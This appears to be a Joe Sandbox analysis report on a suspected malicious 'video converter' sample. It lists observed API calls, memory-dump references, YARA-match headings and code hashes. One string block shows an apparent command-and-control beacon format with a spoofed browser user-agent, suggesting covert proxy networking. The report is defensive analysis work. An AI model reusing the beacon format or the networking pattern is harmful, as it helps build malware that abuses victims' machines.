                                                                                • _memset.LIBCMT ref: 02D86606
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc$Heap$AllocateProcess_memset$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                • API String ID: 2445331799-2678694477
                                                                                • Opcode ID: 46da0763454c96c46ff045a1bcf48073a2c0e66b6f492149f64e5363561d3334
                                                                                • Instruction ID: 85850f25ad2572e8543b1e45c6b21945fbec41e7b33dec20a2e469b03fa8ae29
                                                                                • Opcode Fuzzy Hash: 46da0763454c96c46ff045a1bcf48073a2c0e66b6f492149f64e5363561d3334
                                                                                • Instruction Fuzzy Hash: 9C716172D44340AFE710AB709C49B6FBBE9EF85724F10481AF94597341DA749C01CFAA

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D81D11
                                                                                • GetLastError.KERNEL32 ref: 02D81D23
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D81D59
                                                                                • GetLastError.KERNEL32 ref: 02D81D6B
                                                                                • __beginthreadex.LIBCMT ref: 02D81DB1
                                                                                • GetLastError.KERNEL32 ref: 02D81DC6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D81DDD
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D81DEC
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D81E14
                                                                                • CloseHandle.KERNELBASE(00000000), ref: 02D81E1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                • String ID: thread$thread.entry_event$thread.exit_event
                                                                                • API String ID: 831262434-3017686385
                                                                                • Opcode ID: 89ec5105a9233913a2d744f68ed19903000e99e54c772d09a781e4b5dc3cb444
                                                                                • Instruction ID: e4a62b35c72152dc3b8dc613eb6cefb7ac3c0630bebabe3df54902b3e7803050
                                                                                • Opcode Fuzzy Hash: 89ec5105a9233913a2d744f68ed19903000e99e54c772d09a781e4b5dc3cb444
                                                                                • Instruction Fuzzy Hash: 77312971A043019FE700EF24C849B2FBBA5FB84755F104969F9599B390EB70DD4ACBA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D84608
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                • htons.WS2_32(?), ref: 02D84669
                                                                                • htonl.WS2_32(?), ref: 02D8468C
                                                                                • htonl.WS2_32(00000000), ref: 02D84693
                                                                                • htons.WS2_32(00000000), ref: 02D84747
                                                                                • _sprintf.LIBCMT ref: 02D8475D
                                                                                  • Part of subcall function 02D888BF: _memmove.LIBCMT ref: 02D888DF
                                                                                • htons.WS2_32(?), ref: 02D846B0
                                                                                  • Part of subcall function 02D8966A: __EH_prolog.LIBCMT ref: 02D8966F
                                                                                  • Part of subcall function 02D8966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D896EA
                                                                                  • Part of subcall function 02D8966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D89708
                                                                                  • Part of subcall function 02D81BA7: __EH_prolog.LIBCMT ref: 02D81BAC
                                                                                  • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                                                  • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                                                  • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                                                  • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                                                  • Part of subcall function 02D8DE26: __EH_prolog.LIBCMT ref: 02D8DE2B
                                                                                • htonl.WS2_32(?), ref: 02D8497C
                                                                                • htonl.WS2_32(00000000), ref: 02D84983
                                                                                • htonl.WS2_32(00000000), ref: 02D849C8
                                                                                • htonl.WS2_32(00000000), ref: 02D849CF
                                                                                • htons.WS2_32(?), ref: 02D849EF
                                                                                • htons.WS2_32(?), ref: 02D849F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                • String ID:
                                                                                • API String ID: 1645262487-0
                                                                                • Opcode ID: 2e73e0f1f4104f1fe5d832e0594e0849922b2007f3f0b97f2897d506e4554eff
                                                                                • Instruction ID: 04b7c2e0b433caf82dee1cee9258d57b09958db094b984a8864d1a12174e1aa4
                                                                                • Opcode Fuzzy Hash: 2e73e0f1f4104f1fe5d832e0594e0849922b2007f3f0b97f2897d506e4554eff
                                                                                • Instruction Fuzzy Hash: 5E022671D0125AEFEF15EBA4D844BEEBBB9EF08304F10415AE505A7280DB746E49CFA1

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D84D8B
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84DB7
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84DC3
                                                                                  • Part of subcall function 02D84BED: __EH_prolog.LIBCMT ref: 02D84BF2
                                                                                  • Part of subcall function 02D84BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D84CF2
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84E93
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84E99
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84EA0
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84EA6
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D850A7
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D850AD
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D850B8
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D850C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2062355503-0
                                                                                • Opcode ID: ef4acb0c1b989154a110e8c05762e75fd95feabad3083966a6c8179cc6c4b59c
                                                                                • Instruction ID: 745a0222991d7458afbd0766c450a166fbb4863e752bf987357ae654e4aecc03
                                                                                • Opcode Fuzzy Hash: ef4acb0c1b989154a110e8c05762e75fd95feabad3083966a6c8179cc6c4b59c
                                                                                • Instruction Fuzzy Hash: B1B12871D0025EDFEF15EFA0D840BEEBBB5EF04314F24405AE805A6280DB745A49CFA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                • GetLastError.KERNEL32 ref: 00401F86
                                                                                • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                • String ID:
                                                                                • API String ID: 564119183-0
                                                                                • Opcode ID: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                                                • Instruction ID: 3f373f2fe47a9e58058ec223940fe379f908771e1a31376a549d0366c6000c22
                                                                                • Opcode Fuzzy Hash: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                                                • Instruction Fuzzy Hash: D0314C32A402516FDB109FB99E889AF7FB8EF45344B10807AFA46F7291D6748841C7A8

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D82706
                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D8272B
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DA5A93), ref: 02D82738
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D82778
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D827D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                • String ID: timer
                                                                                • API String ID: 4293676635-1792073242
                                                                                • Opcode ID: c31d0d44902dd7e06b1a5f13d8808a11c3dd3f743987a2c1a620522ea3eace0e
                                                                                • Instruction ID: ebcef521a7c76ba6cc62be910e77403959ad0045178dd45f110fb0aed2af57e5
                                                                                • Opcode Fuzzy Hash: c31d0d44902dd7e06b1a5f13d8808a11c3dd3f743987a2c1a620522ea3eace0e
                                                                                • Instruction Fuzzy Hash: AC318DB1908741AFD310EF65D948B6ABBE8FB48725F104A2EF95582780D770EC14CFA5

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82BE4
                                                                                • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D82C07
                                                                                  • Part of subcall function 02D8A43C: WSAGetLastError.WS2_32(00000000,?,?,02D82A51), ref: 02D8A44A
                                                                                • WSASetLastError.WS2_32 ref: 02D82CD3
                                                                                • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D82CE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Recvselect
                                                                                • String ID: 3'
                                                                                • API String ID: 886190287-280543908
                                                                                • Opcode ID: 03e58b65a55d83a42ba299e335e73af4cf10637c02fce65b9a792bc4c2acfb72
                                                                                • Instruction ID: 33dbede86cdd2a283562b9e5caa7d2f3c35acab4cc94a0388b2271e9ba4d0f6a
                                                                                • Opcode Fuzzy Hash: 03e58b65a55d83a42ba299e335e73af4cf10637c02fce65b9a792bc4c2acfb72
                                                                                • Instruction Fuzzy Hash: 71415CB19093419FDB10AF64D408BABBBE9EF84755F10491EE8D987380EB70DD44CBA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 00402D86
                                                                                  • Part of subcall function 004039F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                                  • Part of subcall function 004039F0: HeapDestroy.KERNEL32 ref: 00403A40
                                                                                • GetCommandLineA.KERNEL32 ref: 00402DD4
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 00402DFF
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402E22
                                                                                  • Part of subcall function 00402E7B: ExitProcess.KERNEL32 ref: 00402E98
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                • String ID: h6z
                                                                                • API String ID: 2057626494-2152286941
                                                                                • Opcode ID: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                                                • Instruction ID: f31f1ce04d2051e6b9e8acf883bbbbaa5bd69f55a1c9941ff1c46623f1a3e60c
                                                                                • Opcode Fuzzy Hash: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                                                • Instruction Fuzzy Hash: AD219FB0840715AADB04EFA6DE09A6E7BB8EB04704F10413FF502B72E2DB388510CB59

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82A3B
                                                                                • closesocket.WS2_32 ref: 02D82A42
                                                                                • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D82A89
                                                                                • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D82A97
                                                                                • closesocket.WS2_32 ref: 02D82A9E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                • String ID:
                                                                                • API String ID: 1561005644-0
                                                                                • Opcode ID: 8d2dbed8ee4db2688655a2e2802f0dd04617ff7af64a34b6983d340e64fa07d4
                                                                                • Instruction ID: 7b10040db507d7dadd8338a8fb1b737f03650cda146a32d31dc78d705b28ce25
                                                                                • Opcode Fuzzy Hash: 8d2dbed8ee4db2688655a2e2802f0dd04617ff7af64a34b6983d340e64fa07d4
                                                                                • Instruction Fuzzy Hash: 7E210371A04245ABEB20BBB8990CB6EB7E9EF44315F11496AEC05D3381EB70CD40CBA1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D81BAC
                                                                                • RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                                                • RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                                                • RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                                                • RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 1633115879-0
                                                                                • Opcode ID: 6645dd131c514ee901b085a4b5945a1ad694a99dec670d416fb46ed20cfd2f4d
                                                                                • Instruction ID: e9ff18df7ae63c50a2aaac6b2419ea1a90e3f2e10084f00407040c71423ba734
                                                                                • Opcode Fuzzy Hash: 6645dd131c514ee901b085a4b5945a1ad694a99dec670d416fb46ed20cfd2f4d
                                                                                • Instruction Fuzzy Hash: CC218BB5A00214DFDB14DF68C444B9AFBB5FF49714F208589E85997301D774ED0ACBA0
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82EEE
                                                                                • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82EFD
                                                                                • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82F0C
                                                                                • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D82F36
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Socketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 2093263913-0
                                                                                • Opcode ID: 70334cf7cde1e91544042ab2e1beef9afe73319da957fd0459e83b7b709ca708
                                                                                • Instruction ID: 5f3d401ed6b32fda5cbf7af721211c9f7eaa4a032e25d734c5b02710d25841b4
                                                                                • Opcode Fuzzy Hash: 70334cf7cde1e91544042ab2e1beef9afe73319da957fd0459e83b7b709ca708
                                                                                • Instruction Fuzzy Hash: F7012571941204BBDB205F66DC48F9EBBA9EB89761F008565F9199B281D7748D00CBB1
                                                                                APIs
                                                                                  • Part of subcall function 02D82D39: WSASetLastError.WS2_32(00000000), ref: 02D82D47
                                                                                  • Part of subcall function 02D82D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D82D5C
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82E6D
                                                                                • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D82E83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Sendselect
                                                                                • String ID: 3'
                                                                                • API String ID: 2958345159-280543908
                                                                                • Opcode ID: 6a9019e6ad640756cb76e2dcc8b52e16dd43d866fb9fbe7b3ce7734ac48d1d15
                                                                                • Instruction ID: a3102f73192ae059b746ac0692003ce13983684b9d7738bc6ef35edc4ba1194d
                                                                                • Opcode Fuzzy Hash: 6a9019e6ad640756cb76e2dcc8b52e16dd43d866fb9fbe7b3ce7734ac48d1d15
                                                                                • Instruction Fuzzy Hash: 64319AB1A002499BDF11AFA4D808BEEBBAAEF05314F00455AEC4997340F7749D55CBE4
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D88306,?,?,00000000), ref: 02D89603
                                                                                • getsockname.WS2_32(?,?,?), ref: 02D89619
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastgetsockname
                                                                                • String ID: &'
                                                                                • API String ID: 566540725-655172784
                                                                                • Opcode ID: 2ca4f0f8be11d4caa61327ae70b14126839c86b26e243cef46ec224fe8eb45bc
                                                                                • Instruction ID: 55d2eb3b0a974d425a8a13fb8373810edbb0700760bd2d25ef84f000d07593fe
                                                                                • Opcode Fuzzy Hash: 2ca4f0f8be11d4caa61327ae70b14126839c86b26e243cef46ec224fe8eb45bc
                                                                                • Instruction Fuzzy Hash: 9C218372A00248DBDB10DF68D845ADEB7F5FF48320F10816AE918EB380D730ED458BA0
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82AEA
                                                                                • connect.WS2_32(?,?,?), ref: 02D82AF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastconnect
                                                                                • String ID: 3'
                                                                                • API String ID: 374722065-280543908
                                                                                • Opcode ID: 482d7d9216ab2a1a948540bbfb50d9a3375c4f6a077f0b135f48bbf1a0c11725
                                                                                • Instruction ID: 67331955dc693571835a27c69097b34abdf6a07083cc1bda84e3fe3099802f7b
                                                                                • Opcode Fuzzy Hash: 482d7d9216ab2a1a948540bbfb50d9a3375c4f6a077f0b135f48bbf1a0c11725
                                                                                • Instruction Fuzzy Hash: 2D21A771E04244ABDF10BFB4D408AAEBBBAEF45325F108559EC1993384DB749E05CFA1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: 6e4265b362242b88166870fd6946a4e12b41f0e6b955258e12e886771d408946
                                                                                • Instruction ID: 36fc0aa80a6b5f9cae08397a381c992044ad703ef9019030aaee553344bd627b
                                                                                • Opcode Fuzzy Hash: 6e4265b362242b88166870fd6946a4e12b41f0e6b955258e12e886771d408946
                                                                                • Instruction Fuzzy Hash: 395138B1904246DFCB48EF68D541AAABBB1FF08720F10819EE8699B380D774DD10CFA0
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 02D836A7
                                                                                  • Part of subcall function 02D82420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D82432
                                                                                  • Part of subcall function 02D82420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D82445
                                                                                  • Part of subcall function 02D82420: RtlEnterCriticalSection.NTDLL(?), ref: 02D82454
                                                                                  • Part of subcall function 02D82420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82469
                                                                                  • Part of subcall function 02D82420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D82470
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1601054111-0
                                                                                • Opcode ID: 5ac02cba9a58e8a41f92c7abffb335ced420e5a1bca52b72f127547a95b333fa
                                                                                • Instruction ID: c7a0a80807553c1242186dc19c6bd2f8680a8ac7a9d6c310bd8b0e9d647116c9
                                                                                • Opcode Fuzzy Hash: 5ac02cba9a58e8a41f92c7abffb335ced420e5a1bca52b72f127547a95b333fa
                                                                                • Instruction Fuzzy Hash: 3411C4B5100249ABDB21AF18CC45FAA3BA9EF00B54F104456FD5A86390C734DC60CBA4
                                                                                APIs
                                                                                • __beginthreadex.LIBCMT ref: 02D92046
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D8A8BC,00000000), ref: 02D92077
                                                                                • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D8A8BC,00000000), ref: 02D92085
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleResumeThread__beginthreadex
                                                                                • String ID:
                                                                                • API String ID: 1685284544-0
                                                                                • Opcode ID: d7f001b832e90fd8240c50e396877f70ce98f94dcc80954157c0a7602b6f8f52
                                                                                • Instruction ID: e3bf140cda8672d5cf20ffd7ab07e0cba64a19bc3369f3bf041138b6e8c7e26f
                                                                                • Opcode Fuzzy Hash: d7f001b832e90fd8240c50e396877f70ce98f94dcc80954157c0a7602b6f8f52
                                                                                • Instruction Fuzzy Hash: 8DF06271240201ABEB209EACDC89F95B3E8EF48725F24456AF55CD7394C771EC92DA90
                                                                                APIs
                                                                                • GetCommandLineW.KERNEL32(00000000), ref: 0040B0A5
                                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 0040B0AC
                                                                                • GetLocalTime.KERNEL32(00409F90), ref: 0040B9B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CommandLine$ArgvLocalTime
                                                                                • String ID:
                                                                                • API String ID: 3768950922-0
                                                                                • Opcode ID: 59b01a3e4a33034627a38184ad815265f60c57ad8a608ecca20853071ff8fe32
                                                                                • Instruction ID: 23e07588f498f8c5e05d00d86472bf9795cdc6e0188d96b461cacdec3fdbfefd
                                                                                • Opcode Fuzzy Hash: 59b01a3e4a33034627a38184ad815265f60c57ad8a608ecca20853071ff8fe32
                                                                                • Instruction Fuzzy Hash: 13F0A072800102EFCB046BA1DE4A42A37E4EA04359316897BD163FA0E5DF3D4846CB8E
                                                                                APIs
                                                                                • GetCommandLineW.KERNEL32(00000000), ref: 0040B0A5
                                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 0040B0AC
                                                                                • GetLocalTime.KERNEL32(00409F90), ref: 0040B9B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CommandLine$ArgvLocalTime
                                                                                • String ID:
                                                                                • API String ID: 3768950922-0
                                                                                • Opcode ID: 667fd779a13e85c584df1a8408aba4467e109f6cd77dd669f4557402a3646338
                                                                                • Instruction ID: 54adafcf78584c863c1ddd2f0e90149891305aa143cab3a49da3de5fd3a430ba
                                                                                • Opcode Fuzzy Hash: 667fd779a13e85c584df1a8408aba4467e109f6cd77dd669f4557402a3646338
                                                                                • Instruction Fuzzy Hash: 9EE04F72904102EFCB04ABE1AA4D46E37E8E604346321843BE113F60E1CB3C88559B5E
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(02DB727C), ref: 02D81ABA
                                                                                • WSAStartup.WS2_32(00000002,00000000), ref: 02D81ACB
                                                                                • InterlockedExchange.KERNEL32(02DB7280,00000000), ref: 02D81AD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$ExchangeIncrementStartup
                                                                                • String ID:
                                                                                • API String ID: 1856147945-0
                                                                                • Opcode ID: 05edf98d07eeb225bd3631bde7ae6c6ea3147fa524883abe2c18c26a00d6daea
                                                                                • Instruction ID: dbaa2c6c46acb6b5f89366b3ea95fbdfc96a1b4b6f85adf9a5c7b80794bc20b4
                                                                                • Opcode Fuzzy Hash: 05edf98d07eeb225bd3631bde7ae6c6ea3147fa524883abe2c18c26a00d6daea
                                                                                • Instruction Fuzzy Hash: F0D05E32E842049BF22176E0BD0FEBCF76CEB05611F100651FC6AC03C0EB519D2885AA
                                                                                APIs
                                                                                • __getptd_noexit.LIBCMT ref: 02D933DA
